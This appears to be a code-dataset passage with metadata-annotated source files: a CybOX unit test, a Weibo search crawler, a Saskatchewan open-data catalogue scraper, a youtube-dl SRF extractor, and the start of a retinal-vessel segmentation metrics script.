# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. import unittest from mixbox.vendor.six import u from cybox.compat import long from cybox.objects.win_filemapping_object import WinFilemapping from cybox.test.objects import ObjectTestCase class TestWinFilemapping(ObjectTestCase, unittest.TestCase): object_type = "WindowsFilemappingObjectType" klass = WinFilemapping _full_dict = { 'handle': { 'id': 1234, 'name': u("MyHandle"), 'type': u("Window"), 'object_address': long(0xdeadbeef), 'access_mask': long(0x70000000), 'pointer_count': long(3), 'xsi:type': "WindowsHandleObjectType", }, 'file_handle': { 'id': 5678, 'name': u("MyHandle2"), 'type': u("Window"), 'object_address': long(0xbeadbeef), 'access_mask': long(0x90009000), 'pointer_count': long(9), 'xsi:type': "WindowsHandleObjectType", }, 'security_attributes': u("Attributes go here"), 'name': "A mapping name", 'maximum_size': 1000, 'actual_size': 250, 'page_protection_value': "a protection value", 'page_protection_attribute': [ "a protection attribute", "another attribute" ], 'xsi:type': object_type } if __name__ == "__main__": unittest.main()
# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. import unittest from mixbox.vendor.six import u from cybox.compat import long from cybox.objects.win_filemapping_object import WinFilemapping from cybox.test.objects import ObjectTestCase class TestWinFilemapping(ObjectTestCase, unittest.TestCase): object_type = "WindowsFilemappingObjectType" klass = WinFilemapping _full_dict = { 'handle': { 'id': 1234, 'name': u("MyHandle"), 'type': u("Window"), 'object_address': long(0xdeadbeef), 'access_mask': long(0x70000000), 'pointer_count': long(3), 'xsi:type': "WindowsHandleObjectType", }, 'file_handle': { 'id': 5678, 'name': u("MyHandle2"), 'type': u("Window"), 'object_address': long(0xbeadbeef), 'access_mask': long(0x90009000), 'pointer_count': long(9), 'xsi:type': "WindowsHandleObjectType", }, 'security_attributes': u("Attributes go here"), 'name': "A mapping name", 'maximum_size': 1000, 'actual_size': 250, 'page_protection_value': "a protection value", 'page_protection_attribute': [ "a protection attribute", "another attribute" ], 'xsi:type': object_type } if __name__ == "__main__": unittest.main()
en
0.854889
# Copyright (c) 2017, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms.
1.997469
2
tasks/search.py
Lifeistrange/WeiboSpider
1
6628997
# coding:utf-8 from urllib import parse as url_parse from logger.log import crawler from tasks.workers import app from page_get.basic import get_page from config.conf import get_max_search_page from page_parse import search as parse_search from db.search_words import get_search_keywords from db.keywords_wbdata import insert_keyword_wbid from db.wb_data import insert_weibo_data, get_wb_by_mid # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 url = 'http://s.weibo.com/weibo/{}&scope=ori&suball=1&page={}' limit = get_max_search_page() + 1 @app.task(ignore_result=True) def search_keyword(keyword, keyword_id): cur_page = 1 encode_keyword = url_parse.quote(keyword) while cur_page < limit: cur_url = url.format(encode_keyword, cur_page) search_page = get_page(cur_url) if not search_page: crawler.warning('本次并没获取到关键词{}的相关微博,该页面源码是{}'.format(keyword, search_page)) return search_list = parse_search.get_search_info(search_page) # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 for wb_data in search_list: rs = get_wb_by_mid(wb_data.weibo_id) if rs: crawler.info('关键词{}本次搜索更新的微博已经获取完成'.format(keyword)) return else: insert_weibo_data(wb_data) insert_keyword_wbid(keyword_id, wb_data.weibo_id) # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 app.send_task('tasks.user.crawl_person_infos', args=(wb_data.uid,), queue='user_crawler', routing_key='for_user_info') # 判断是否包含下一页 if 'page next S_txt1 S_line1' in search_page: cur_page += 1 else: crawler.info('关键词{}搜索完成'.format(keyword)) return @app.task(ignore_result=True) def excute_search_task(): keywords = get_search_keywords() for each in keywords: app.send_task('tasks.search.search_keyword', args=(each[0], each[1]), queue='search_crawler', routing_key='for_search_info')
# coding:utf-8 from urllib import parse as url_parse from logger.log import crawler from tasks.workers import app from page_get.basic import get_page from config.conf import get_max_search_page from page_parse import search as parse_search from db.search_words import get_search_keywords from db.keywords_wbdata import insert_keyword_wbid from db.wb_data import insert_weibo_data, get_wb_by_mid # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 url = 'http://s.weibo.com/weibo/{}&scope=ori&suball=1&page={}' limit = get_max_search_page() + 1 @app.task(ignore_result=True) def search_keyword(keyword, keyword_id): cur_page = 1 encode_keyword = url_parse.quote(keyword) while cur_page < limit: cur_url = url.format(encode_keyword, cur_page) search_page = get_page(cur_url) if not search_page: crawler.warning('本次并没获取到关键词{}的相关微博,该页面源码是{}'.format(keyword, search_page)) return search_list = parse_search.get_search_info(search_page) # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 for wb_data in search_list: rs = get_wb_by_mid(wb_data.weibo_id) if rs: crawler.info('关键词{}本次搜索更新的微博已经获取完成'.format(keyword)) return else: insert_weibo_data(wb_data) insert_keyword_wbid(keyword_id, wb_data.weibo_id) # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 app.send_task('tasks.user.crawl_person_infos', args=(wb_data.uid,), queue='user_crawler', routing_key='for_user_info') # 判断是否包含下一页 if 'page next S_txt1 S_line1' in search_page: cur_page += 1 else: crawler.info('关键词{}搜索完成'.format(keyword)) return @app.task(ignore_result=True) def excute_search_task(): keywords = get_search_keywords() for each in keywords: app.send_task('tasks.search.search_keyword', args=(each[0], each[1]), queue='search_crawler', routing_key='for_search_info')
zh
0.989169
# coding:utf-8 # 只抓取原创微博,默认是按照时间进行排序,如果只抓首页,那么就不需要登录 # 先判断数据库里是否存在相关的微博,如果是已有的,那就说明是已经抓取的微博(因为结果默认按时间排序),就退出循环 # 这里暂时使用网络调用而非本地调用,权衡两种方法的好处 # 判断是否包含下一页
2.545891
3
scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py
Dan-Eli/FGP_Docs
0
6628998
<filename>scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py import os import sys import urllib2 from bs4 import BeautifulSoup, Comment import collections import math import csv import re import numpy as np import json import urlparse import argparse import traceback import datetime import time import codecs from operator import itemgetter from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.common.exceptions import TimeoutException from selenium.webdriver.firefox.options import Options # Get the shared.py script_file = os.path.abspath(__file__) script_folder = os.path.dirname(script_file) province_folder = os.path.dirname(script_folder) home_folder = os.path.dirname(province_folder) script_folder = home_folder + "\\scripts" sys.path.append(script_folder) import shared import access_rest as rest province = 'Saskatchewan' work_folder = 'H:\\GIS_Data\\Work\\NRCan\\FGP\\TA001\\_%s' % province site_list = collections.OrderedDict([ ('ducks', ('extract_ducks()', 'http://maps.ducks.ca/arcgis/rest/services')), ('commview', ('extract_commview()', 'http://www.communityview.ca/Catalogue'))]) def extract_commview(): commview_url = site_list['commview'][1] soup = shared.soup_it_up(commview_url) # Create CSV file csv_fn = "CommunityView_results" field_names = ['Title', 'Available Formats', 'Map URL', 'Data URL'] my_csv = shared.MyCSV(csv_fn, commview_url, province, field_names) my_csv.open_csv() # Get a list of all the anchors in the treeview at the side of the page ul = soup.find('ul', attrs={'class': 'treeview'}) anchors = ul.find_all('a', attrs={'class': 'TreeRootStandard'}) for anchor in anchors: browse_url = urlparse.urljoin(commview_url, anchor['href']) #print browse_url # Load the sub result sub_soup = shared.soup_it_up(browse_url) # Determine the number of pages in the search page_count = 
shared.get_page_count(sub_soup, 'pager', 'a') for page in range(0, page_count): # Load the current page if page > 0: page_url = "%s?page=%s" % (browse_url, page + 1) sub_soup = shared.soup_it_up(page_url) # Get the resource list resources_div = sub_soup.find('div', attrs={'class': 'ResourceList'}) resources = sub_soup.find_all('table', attrs={'class': 'ResourceTable'}) for res in resources: map_res = res.find('img', attrs={'alt': 'Map'}) # Get the ID of the resource parent = res.parent id = parent['id'].replace("ResourceTable", "") # Get the name of the resource name = res.find('a', attrs={'class': "ResourceTitle"}).text if map_res is not None: # If the resource contains a map link, it will be included in the inventory rec_dict = collections.OrderedDict((k, "") for k in field_names) # Get the URLs for the data map_url = urlparse.urljoin(commview_url, map_res.parent['href']) data_url = map_url.replace("Map", "Data") #['Title', 'Available Formats', 'Map URL', 'Data URL'] rec_dict['Title'] = name rec_dict['Available Formats'] = "XLS" rec_dict['Map URL'] = map_url rec_dict['Data URL'] = data_url my_csv.write_dataset(rec_dict) my_csv.close_csv() def extract_ducks(): ducks_url = site_list['ducks'][1] my_rest = rest.MyREST(ducks_url) services = my_rest.get_services() # Create CSV file csv_fn = "Ducks_results" field_names = ['Title', 'Type', 'Description', 'URL'] my_csv = shared.MyCSV(csv_fn, ducks_url, province, field_names) my_csv.open_csv() for service in services: if service['name'].find("SK") > -1: rec_dict = collections.OrderedDict((k, "") for k in field_names) #print service rec_dict['Title'] = service['name'] rec_dict['Type'] = service['type'] rec_dict['Description'] = shared.edit_description(service['serviceDescription']) rec_dict['URL'] = service['url'] my_csv.write_dataset(rec_dict) my_csv.close_csv() def main(): #city_list = ['Winnipeg', 'Brandon'] parser = argparse.ArgumentParser() parser.add_argument("-t", "--tool", help="The tool to use: %s or all" % ', 
'.join(site_list.keys())) #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") parser.add_argument("-s", "--silent", action='store_true', help="If used, no extra parameters will be queried.") args = parser.parse_args() #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) tool = args.tool #word = args.word #formats = args.format #html = args.html silent = args.silent #cat = args.category #downloadable = args.downloadable if tool is None: answer = raw_input("Please enter the site you would like to extract (%s): " % ', '.join(site_list.keys())) if not answer == "": tool = answer.lower() else: print "\nERROR: Please specify a site." print "Exiting process." sys.exit(1) # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() if tool == "all": for key, site in site_list.items(): eval(site_list[key][0]) else: if tool in site_list.keys(): eval(site_list[tool][0]) else: print "\nERROR: Invalid tool '%s'. Please enter one of the following: %s" % (tool, ', '.join(site_list.keys())) print "Exiting process." sys.exit(1) #geoportal_list = extract_geoportal(province) if __name__ == '__main__': sys.exit(main())
<filename>scripts/PT_WebExtractor_v2_0/scripts/obsolete/SK_Other_extractor.py import os import sys import urllib2 from bs4 import BeautifulSoup, Comment import collections import math import csv import re import numpy as np import json import urlparse import argparse import traceback import datetime import time import codecs from operator import itemgetter from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.common.exceptions import TimeoutException from selenium.webdriver.firefox.options import Options # Get the shared.py script_file = os.path.abspath(__file__) script_folder = os.path.dirname(script_file) province_folder = os.path.dirname(script_folder) home_folder = os.path.dirname(province_folder) script_folder = home_folder + "\\scripts" sys.path.append(script_folder) import shared import access_rest as rest province = 'Saskatchewan' work_folder = 'H:\\GIS_Data\\Work\\NRCan\\FGP\\TA001\\_%s' % province site_list = collections.OrderedDict([ ('ducks', ('extract_ducks()', 'http://maps.ducks.ca/arcgis/rest/services')), ('commview', ('extract_commview()', 'http://www.communityview.ca/Catalogue'))]) def extract_commview(): commview_url = site_list['commview'][1] soup = shared.soup_it_up(commview_url) # Create CSV file csv_fn = "CommunityView_results" field_names = ['Title', 'Available Formats', 'Map URL', 'Data URL'] my_csv = shared.MyCSV(csv_fn, commview_url, province, field_names) my_csv.open_csv() # Get a list of all the anchors in the treeview at the side of the page ul = soup.find('ul', attrs={'class': 'treeview'}) anchors = ul.find_all('a', attrs={'class': 'TreeRootStandard'}) for anchor in anchors: browse_url = urlparse.urljoin(commview_url, anchor['href']) #print browse_url # Load the sub result sub_soup = shared.soup_it_up(browse_url) # Determine the number of pages in the search page_count = 
shared.get_page_count(sub_soup, 'pager', 'a') for page in range(0, page_count): # Load the current page if page > 0: page_url = "%s?page=%s" % (browse_url, page + 1) sub_soup = shared.soup_it_up(page_url) # Get the resource list resources_div = sub_soup.find('div', attrs={'class': 'ResourceList'}) resources = sub_soup.find_all('table', attrs={'class': 'ResourceTable'}) for res in resources: map_res = res.find('img', attrs={'alt': 'Map'}) # Get the ID of the resource parent = res.parent id = parent['id'].replace("ResourceTable", "") # Get the name of the resource name = res.find('a', attrs={'class': "ResourceTitle"}).text if map_res is not None: # If the resource contains a map link, it will be included in the inventory rec_dict = collections.OrderedDict((k, "") for k in field_names) # Get the URLs for the data map_url = urlparse.urljoin(commview_url, map_res.parent['href']) data_url = map_url.replace("Map", "Data") #['Title', 'Available Formats', 'Map URL', 'Data URL'] rec_dict['Title'] = name rec_dict['Available Formats'] = "XLS" rec_dict['Map URL'] = map_url rec_dict['Data URL'] = data_url my_csv.write_dataset(rec_dict) my_csv.close_csv() def extract_ducks(): ducks_url = site_list['ducks'][1] my_rest = rest.MyREST(ducks_url) services = my_rest.get_services() # Create CSV file csv_fn = "Ducks_results" field_names = ['Title', 'Type', 'Description', 'URL'] my_csv = shared.MyCSV(csv_fn, ducks_url, province, field_names) my_csv.open_csv() for service in services: if service['name'].find("SK") > -1: rec_dict = collections.OrderedDict((k, "") for k in field_names) #print service rec_dict['Title'] = service['name'] rec_dict['Type'] = service['type'] rec_dict['Description'] = shared.edit_description(service['serviceDescription']) rec_dict['URL'] = service['url'] my_csv.write_dataset(rec_dict) my_csv.close_csv() def main(): #city_list = ['Winnipeg', 'Brandon'] parser = argparse.ArgumentParser() parser.add_argument("-t", "--tool", help="The tool to use: %s or all" % ', 
'.join(site_list.keys())) #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") parser.add_argument("-s", "--silent", action='store_true', help="If used, no extra parameters will be queried.") args = parser.parse_args() #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) tool = args.tool #word = args.word #formats = args.format #html = args.html silent = args.silent #cat = args.category #downloadable = args.downloadable if tool is None: answer = raw_input("Please enter the site you would like to extract (%s): " % ', '.join(site_list.keys())) if not answer == "": tool = answer.lower() else: print "\nERROR: Please specify a site." print "Exiting process." sys.exit(1) # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() if tool == "all": for key, site in site_list.items(): eval(site_list[key][0]) else: if tool in site_list.keys(): eval(site_list[tool][0]) else: print "\nERROR: Invalid tool '%s'. Please enter one of the following: %s" % (tool, ', '.join(site_list.keys())) print "Exiting process." sys.exit(1) #geoportal_list = extract_geoportal(province) if __name__ == '__main__': sys.exit(main())
en
0.482465
# Get the shared.py # Create CSV file # Get a list of all the anchors in the treeview at the side of the page #print browse_url # Load the sub result # Determine the number of pages in the search # Load the current page # Get the resource list # Get the ID of the resource # Get the name of the resource # If the resource contains a map link, it will be included in the inventory # Get the URLs for the data #['Title', 'Available Formats', 'Map URL', 'Data URL'] # Create CSV file #print service #city_list = ['Winnipeg', 'Brandon'] #parser.add_argument("-w", "--word", help="The key word(s) to search for.") #parser.add_argument("-f", "--format", help="The format(s) to search for.") #parser.add_argument("-a", "--category", help="The category to search for.") #parser.add_argument("-d", "--downloadable", help="Determines wheter to get only downloadable datasets.") #parser.add_argument("-l", "--html", help="The HTML file to scrape (only for OpenData website).") #print args.echo #print "province: " + str(args.province) #print "format: " + str(args.format) #word = args.word #formats = args.format #html = args.html #cat = args.category #downloadable = args.downloadable # if word is None and not silent: # answer = raw_input("Please enter the word you would like to search: ") # if not answer == "": # word = answer.lower() # if cat is None and not silent: # answer = raw_input("Please enter the category you would like to search: ") # if not answer == "": # cat = answer.lower() #geoportal_list = extract_geoportal(province)
2.433635
2
youtube_dl/extractor/srf.py
zoogaezee/youtubeDL
0
6628999
# coding: utf-8 from __future__ import unicode_literals import re from .common import InfoExtractor from ..utils import ( determine_ext, parse_iso8601, xpath_text, ) class SrfIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/(?:tv|radio)/[^/]+/(?P<media_type>video|audio)/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})' _TESTS = [{ 'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'md5': '4cd93523723beff51bb4bee974ee238d', 'info_dict': { 'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'display_id': 'snowden-beantragt-asyl-in-russland', 'ext': 'm4v', 'upload_date': '20130701', 'title': 'Snowden beantragt Asyl in Russland', 'timestamp': 1372713995, } }, { # No Speichern (Save) button 'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa', 'md5': 'd97e236e80d1d24729e5d0953d276a4f', 'info_dict': { 'id': '677f5829-e473-4823-ac83-a1087fe97faa', 'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive', 'ext': 'flv', 'upload_date': '20130710', 'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive', 'timestamp': 1373493600, }, }, { 'url': 'http://www.srf.ch/play/radio/hoerspielarchiv-srf-musikwelle/audio/saegel-ohni-wind-von-jakob-stebler?id=415bf3d3-6429-4de7-968d-95866e37cfbc', 'md5': '', 'info_dict': { 'id': '415bf3d3-6429-4de7-968d-95866e37cfbc', 'display_id': 'saegel-ohni-wind-von-jakob-stebler', 'ext': 'mp3', 'upload_date': '20080518', 'title': '«Sägel ohni Wind» von J<NAME>', 'timestamp': 1211112000, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { 'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }, { 'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': 
True, }] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') media_type = mobj.group('media_type') display_id = mobj.group('display_id') or video_id video_data = self._download_xml( 'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/%s/play/%s.xml' % (media_type, video_id), display_id) title = xpath_text( video_data, './AssetMetadatas/AssetMetadata/title', fatal=True) thumbnails = [{ 'url': s.text } for s in video_data.findall('.//ImageRepresentation/url')] timestamp = parse_iso8601(xpath_text(video_data, './createdDate')) # The <duration> field in XML is different from the exact duration, skipping formats = [] for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'): for url_node in item.findall('url'): quality = url_node.attrib['quality'] full_url = url_node.text original_ext = determine_ext(full_url).lower() format_id = '%s-%s' % (quality, item.attrib['protocol']) if original_ext == 'f4m': formats.extend(self._extract_f4m_formats( full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id)) elif original_ext == 'm3u8': formats.extend(self._extract_m3u8_formats( full_url, display_id, 'mp4', m3u8_id=format_id)) else: formats.append({ 'url': full_url, 'ext': original_ext, 'format_id': format_id, 'quality': 0 if 'HD' in quality else -1, 'preference': 1, }) self._sort_formats(formats) subtitles = {} subtitles_data = video_data.find('Subtitles') if subtitles_data is not None: subtitles_list = [{ 'url': sub.text, 'ext': determine_ext(sub.text), } for sub in subtitles_data] if subtitles_list: subtitles['de'] = subtitles_list return { 'id': video_id, 'display_id': display_id, 'formats': formats, 'title': title, 'thumbnails': thumbnails, 'timestamp': timestamp, 'subtitles': subtitles, }
# coding: utf-8 from __future__ import unicode_literals import re from .common import InfoExtractor from ..utils import ( determine_ext, parse_iso8601, xpath_text, ) class SrfIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/(?:tv|radio)/[^/]+/(?P<media_type>video|audio)/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})' _TESTS = [{ 'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'md5': '4cd93523723beff51bb4bee974ee238d', 'info_dict': { 'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'display_id': 'snowden-beantragt-asyl-in-russland', 'ext': 'm4v', 'upload_date': '20130701', 'title': 'Snowden beantragt Asyl in Russland', 'timestamp': 1372713995, } }, { # No Speichern (Save) button 'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa', 'md5': 'd97e236e80d1d24729e5d0953d276a4f', 'info_dict': { 'id': '677f5829-e473-4823-ac83-a1087fe97faa', 'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive', 'ext': 'flv', 'upload_date': '20130710', 'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive', 'timestamp': 1373493600, }, }, { 'url': 'http://www.srf.ch/play/radio/hoerspielarchiv-srf-musikwelle/audio/saegel-ohni-wind-von-jakob-stebler?id=415bf3d3-6429-4de7-968d-95866e37cfbc', 'md5': '', 'info_dict': { 'id': '415bf3d3-6429-4de7-968d-95866e37cfbc', 'display_id': 'saegel-ohni-wind-von-jakob-stebler', 'ext': 'mp3', 'upload_date': '20080518', 'title': '«Sägel ohni Wind» von J<NAME>', 'timestamp': 1211112000, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { 'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': True, }, { 'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5', 'only_matching': 
True, }] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') media_type = mobj.group('media_type') display_id = mobj.group('display_id') or video_id video_data = self._download_xml( 'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/%s/play/%s.xml' % (media_type, video_id), display_id) title = xpath_text( video_data, './AssetMetadatas/AssetMetadata/title', fatal=True) thumbnails = [{ 'url': s.text } for s in video_data.findall('.//ImageRepresentation/url')] timestamp = parse_iso8601(xpath_text(video_data, './createdDate')) # The <duration> field in XML is different from the exact duration, skipping formats = [] for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'): for url_node in item.findall('url'): quality = url_node.attrib['quality'] full_url = url_node.text original_ext = determine_ext(full_url).lower() format_id = '%s-%s' % (quality, item.attrib['protocol']) if original_ext == 'f4m': formats.extend(self._extract_f4m_formats( full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id)) elif original_ext == 'm3u8': formats.extend(self._extract_m3u8_formats( full_url, display_id, 'mp4', m3u8_id=format_id)) else: formats.append({ 'url': full_url, 'ext': original_ext, 'format_id': format_id, 'quality': 0 if 'HD' in quality else -1, 'preference': 1, }) self._sort_formats(formats) subtitles = {} subtitles_data = video_data.find('Subtitles') if subtitles_data is not None: subtitles_list = [{ 'url': sub.text, 'ext': determine_ext(sub.text), } for sub in subtitles_data] if subtitles_list: subtitles['de'] = subtitles_list return { 'id': video_id, 'display_id': display_id, 'formats': formats, 'title': title, 'thumbnails': thumbnails, 'timestamp': timestamp, 'subtitles': subtitles, }
en
0.831412
# coding: utf-8 # No Speichern (Save) button # requires rtmpdump # The <duration> field in XML is different from the exact duration, skipping
2.091546
2
eval.py
Limingxing00/Retinal-Vessel-Segmentation-ISBI2022
9
6629000
<reponame>Limingxing00/Retinal-Vessel-Segmentation-ISBI2022<gh_stars>1-10 import numpy as np from matplotlib import pyplot as plt # scikit learn from sklearn.metrics import roc_curve from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import precision_recall_curve from sklearn.metrics import jaccard_similarity_score from sklearn.metrics import f1_score import numpy as np from PIL import Image from sklearn.metrics import f1_score from sklearn.metrics import accuracy_score, roc_curve, auc, classification_report, roc_auc_score import os import yaml import pdb from lib.config import parse_args import warnings warnings.filterwarnings("ignore") """ calculate metrics for entire retinal vessel images. """ def metrics(label_path, prediction_path, cfg): """ :param foreground: pixel value 255 is foreground. """ label_file_name = sorted(os.listdir(label_path)) pred_file_name = sorted(os.listdir(prediction_path)) f1m = [] accm = [] aucm = [] specificitym = [] precisionm = [] sensitivitym = [] # pdb.set_trace() for i in range(len(label_file_name)): label = Image.open(label_path + "/" + label_file_name[i]) label = np.array(label) # label[label <= 128] = 0 # label[label > 128] = 1 pred = Image.open(prediction_path + "/" + pred_file_name[i]) pred = (np.array(pred)).flatten() / 255 if label.max()==1: label = (label).astype(np.uint8).flatten() elif label.max()==255: label = (label).astype(np.uint8).flatten() / 255 else: raise RuntimeError('Please check your label.') # pdb.set_trace() # check the pixel value # pdb.set_trace() assert label.max() == 1 and (pred).max() <= 1 assert label.min() == 0 and (pred).min() >= 0 # test another datasets ISBI 2012 if cfg['DATASET'] == "ISBI2012": label = 1 - label pred = 1 - pred y_scores, y_true = pred, label # Area under the ROC curve # pdb.set_trace() fpr, tpr, thresholds = roc_curve((y_true), y_scores) AUC_ROC = roc_auc_score(y_true, y_scores) # test_integral = np.trapz(tpr,fpr) #trapz is 
numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve precision, recall, thresholds = precision_recall_curve(y_true, y_scores) precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC) recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC) AUC_prec_rec = np.trapz(precision, recall) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix threshold_confusion = 0.5 # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) y_pred = np.empty((y_scores.shape[0])) for i in range(y_scores.shape[0]): if y_scores[i] >= threshold_confusion: y_pred[i] = 1 else: y_pred[i] = 0 confusion = confusion_matrix(y_true, y_pred) # print (confusion) accuracy = 0 if float(np.sum(confusion)) != 0: accuracy = float(confusion[0, 0] + confusion[1, 1]) / float(np.sum(confusion)) # print ("Global Accuracy: " +str(accuracy)) specificity = 0 if float(confusion[0, 0] + confusion[0, 1]) != 0: specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1]) # print ("Specificity: " +str(specificity)) sensitivity = 0 if float(confusion[1, 1] + confusion[1, 0]) != 0: sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0]) # print ("Sensitivity: " +str(sensitivity)) precision = 0 if float(confusion[1, 1] + confusion[0, 1]) != 0: precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1]) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score F1_score = f1_score(y_true, y_pred, average='binary') # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) 
f1m.append(F1_score) accm.append(accuracy) aucm.append(AUC_ROC) specificitym.append(specificity) precisionm.append(precision) sensitivitym.append(sensitivity) # print("Your score of new data is {}".format(np.array(f1m).mean())) return np.array(f1m).mean(), np.array(accm).mean(), np.array(aucm).mean(), np.array(specificitym).mean(), np.array( precisionm).mean(), np.array(sensitivitym).mean() if __name__ == "__main__": args = parse_args() f = open(args.cfg_file) cfg = yaml.load(f) # pdb.set_trace() f1, acc, auc, specificity, precision, sensitivity = metrics(label_path=cfg['TEST_LABEL_PATH'], prediction_path=cfg['TEST_PRED_PATH'], cfg=cfg) print("f1", f1, "accuracy", acc, "auc", auc, "specificity", specificity, "precision", precision, "sensitivity", sensitivity) # ====== Evaluate the results
import numpy as np from matplotlib import pyplot as plt # scikit learn from sklearn.metrics import roc_curve from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import precision_recall_curve from sklearn.metrics import jaccard_similarity_score from sklearn.metrics import f1_score import numpy as np from PIL import Image from sklearn.metrics import f1_score from sklearn.metrics import accuracy_score, roc_curve, auc, classification_report, roc_auc_score import os import yaml import pdb from lib.config import parse_args import warnings warnings.filterwarnings("ignore") """ calculate metrics for entire retinal vessel images. """ def metrics(label_path, prediction_path, cfg): """ :param foreground: pixel value 255 is foreground. """ label_file_name = sorted(os.listdir(label_path)) pred_file_name = sorted(os.listdir(prediction_path)) f1m = [] accm = [] aucm = [] specificitym = [] precisionm = [] sensitivitym = [] # pdb.set_trace() for i in range(len(label_file_name)): label = Image.open(label_path + "/" + label_file_name[i]) label = np.array(label) # label[label <= 128] = 0 # label[label > 128] = 1 pred = Image.open(prediction_path + "/" + pred_file_name[i]) pred = (np.array(pred)).flatten() / 255 if label.max()==1: label = (label).astype(np.uint8).flatten() elif label.max()==255: label = (label).astype(np.uint8).flatten() / 255 else: raise RuntimeError('Please check your label.') # pdb.set_trace() # check the pixel value # pdb.set_trace() assert label.max() == 1 and (pred).max() <= 1 assert label.min() == 0 and (pred).min() >= 0 # test another datasets 